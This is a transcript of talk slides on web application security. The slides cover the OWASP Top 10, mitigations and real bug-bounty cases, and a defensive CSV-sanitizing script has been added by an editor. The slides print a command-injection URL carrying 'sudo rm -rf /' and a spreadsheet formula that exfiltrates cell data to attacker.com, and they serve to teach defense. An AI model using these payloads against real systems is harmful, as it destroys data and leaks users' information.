Let's talk Security

Slides from Engineering Talkies at Wingify

Dheeraj Joshi

April 21, 2016

Transcript

  2. About Me
     I find security vulnerabilities for fun & swag, and I wear a White Hat.
     Uber, CKEditor, Dropbox, MailChimp, InVision, DigitalOcean, Cloudflare, Intuit, Groupon, etc.
     What makes me happy?
  3. Security - Into The Details
     • OWASP's Top 10 Vulnerabilities
       ◦ Explain
       ◦ Impact
       ◦ Defense
       ◦ Real examples (External + Internal)
     • Demo - RCE
     • Q & A
  4. Why should Startups Care about Security?
     Startups & SMEs are prone to cutting corners. One of the first things they cut is 'Security'.
  9. PREVENT INJECTION
     • For databases, use prepared statements
     • Whitelist inputs wherever possible
     • Sanitize inputs (use the filter extension)
     • Don't trust user input, and always verify!
  10. Example: Google Command Injection
      We can include any command in the URL below:
      https://console.cloud.google.com/home/dashboard?project=;sudo rm -rf /
      Found by an Indian Security Researcher (S. Venkatesh)
  11. Exploiting 'Export as CSV' functionality - Formula Injection
      =HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")
      If the victim clicks this cell, they will inadvertently exfiltrate the contents of cells A1 and A2 to the attacker's website, which may include other users' sensitive information.
      Fix - prefix a single quote (') to values that begin with one of the formula triggers (=, +, -)
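A defensive version of the slide's fix, added here as an example (not code from the talk): a CSV export helper that prefixes a single quote to any cell beginning with a formula trigger, run over constructed sample rows that include the HYPERLINK payload above. The "@" trigger and the sample data are assumptions, not from the slide.

```python
import csv
import io

# Characters that make a spreadsheet treat a cell as a formula.
# The slide lists =, + and -; "@" is added on the same principle
# (it starts formulas in Excel) and is an assumption, not from the slide.
FORMULA_TRIGGERS = ("=", "+", "-", "@")


def neutralize_cell(value):
    """Return the cell text with a leading single quote if it would
    otherwise be read as a formula. The quote is a text marker in
    spreadsheets, so the value is shown literally and never evaluated."""
    text = "" if value is None else str(value)
    # Be conservative: check the first non-blank character, since how
    # different spreadsheet apps handle leading whitespace varies.
    stripped = text.lstrip()
    if stripped and stripped[0] in FORMULA_TRIGGERS:
        return "'" + text
    return text


def export_rows(rows):
    """Serialize rows (lists of cells) to CSV text with every cell
    neutralized. csv.writer handles quoting of commas and quotes inside
    a cell, so the escaping is not done by hand."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    for row in rows:
        writer.writerow([neutralize_cell(c) for c in row])
    return buf.getvalue()


# Constructed sample export: two ordinary users plus one attacker-supplied
# "name" carrying the HYPERLINK payload from the slide.
SAMPLE_ROWS = [
    ["name", "email"],
    ["alice", "alice@example.com"],
    ['=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please click for further information")',
     "x@example.com"],
    ["-5 degrees", "bob@example.com"],
]

if __name__ == "__main__":
    print(export_rows(SAMPLE_ROWS))
```

The leading quote is visible in some CSV importers; that cosmetic cost is the accepted trade-off for never letting a user-supplied cell execute on another user's machine.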
  13. MITIGATION
      • Enforce a strong password policy
      • Require periodic password resets
      • Use 2 factor authentication
      • Use SSL and the secure flag on cookies
      • Don't neglect failed-login detection & tracking
      • Only use httpOnly cookies
  14. CROSS SITE SCRIPTING - XSS
      • XSS attacks users
      • "JavaScript Injection"
      • Exploits can be bad, really bad..
  18. Protect Yourself
      • Use the filter extension to filter inputs
      • Ensure that outputs are HTML encoded
      • Don't reinvent the wheel
      • Don't consider any part of the request as being "safe"
  19. ngBind attribute
      $sanitize - service in module ngSanitize
      Sanitizes an HTML string by stripping all potentially dangerous tokens.
  21. Scenario / Exploit
      1) First, an attacker signs up for an account and requests "forgot password".
      2) You will receive a link: https://vimeo.com/forgot_password/[user id]/[token]
  22. Prevention
      • Low level access controls
      • Prevent user input in file/URL access commands
      • No unsanitized input to execution commands
  24. PREVENTION > CURE
      • Perform periodic security checks using automated tools
      • Static Code Analysis
      • Example: Hardening MySQL, Directory Listing, Auth Tokens
  25. SENSITIVE DATA EXPOSURE
      • Exposed PHP error messages
      • Unencrypted sensitive data storage
      • Not using SSL
      • Example: a sensitive token should not be sent to external websites (Fitbit)
  26. MISSING FUNCTION LEVEL ACCESS CONTROL
      • Valid input processing without access controls
      • Decentralized access control layer
      • Example: Profile email address not validated (GitHub), S3 configuration
  27. CROSS-SITE REQUEST FORGERY (CSRF)
      • Don't perform data changes on GET
      • Use secure (CSRF) tokens for POST
      • Impact: Real bad, attacks users
      • Example: Dropbox, CodeSchool
  28. USING COMPONENTS WITH KNOWN VULNERABILITIES
      • Not keeping libraries up-to-date
      • *cough*WordPress*cough*
      • Example: Third-Party Libraries (Apache CXF Authentication Bypass, Spring RCE)
  29. UNVALIDATED REDIRECTS AND FORWARDS
      • Header Injection
      • JavaScript Parameter Injection
      • Reliance on HTTP_REFERER
      • Abuse of window.opener (Facebook)
  32. The solution
      • Reset all passwords and keys
      • Remove backdoors (not easy)
      OR
      Destroy everything??